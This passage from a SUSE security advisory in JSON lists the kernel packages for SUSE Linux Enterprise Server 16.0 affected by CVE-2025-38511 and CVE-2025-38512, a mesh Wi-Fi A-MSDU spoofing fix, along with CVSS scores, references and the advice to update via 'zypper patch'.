"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "important"
}
],
"title": "CVE-2025-38511"
},
{
"cve": "CVE-2025-38512",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38512"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: prevent A-MSDU attacks in mesh networks\n\nThis patch is a mitigation to prevent the A-MSDU spoofing vulnerability\nfor mesh networks. The initial update to the IEEE 802.11 standard, in\nresponse to the FragAttacks, missed this case (CVE-2025-27558). It can\nbe considered a variant of CVE-2020-24588 but for mesh networks.\n\nThis patch tries to detect if a standard MSDU was turned into an A-MSDU\nby an adversary. This is done by parsing a received A-MSDU as a standard\nMSDU, calculating the length of the Mesh Control header, and seeing if\nthe 6 bytes after this header equal the start of an rfc1042 header. If\nequal, this is a strong indication of an ongoing attack attempt.\n\nThis defense was tested with mac80211_hwsim against a mesh network that\nuses an empty Mesh Address Extension field, i.e., when four addresses\nare used, and when using a 12-byte Mesh Address Extension field, i.e.,\nwhen six addresses are used. Functionality of normal MSDUs and A-MSDUs\nwas also tested, and confirmed working, when using both an empty and\n12-byte Mesh Address Extension field.\n\nIt was also tested with mac80211_hwsim that A-MSDU attacks in non-mesh\nnetworks keep being detected and prevented.\n\nNote that the vulnerability being patched, and the defense being\nimplemented, was also discussed in the following paper and in the\nfollowing IEEE 802.11 presentation:\n\nhttps://papers.mathyvanhoef.com/wisec2025.pdf\nhttps://mentor.ieee.org/802.11/dcn/25/11-25-0949-00-000m-a-msdu-mesh-spoof-protection.docx",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38512",
"url": "https://www.suse.com/security/cve/CVE-2025-38512"
},
{
"category": "external",
"summary": "SUSE Bug 1248178 for CVE-2025-38512",
"url": "https://bugzilla.suse.com/1248178"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
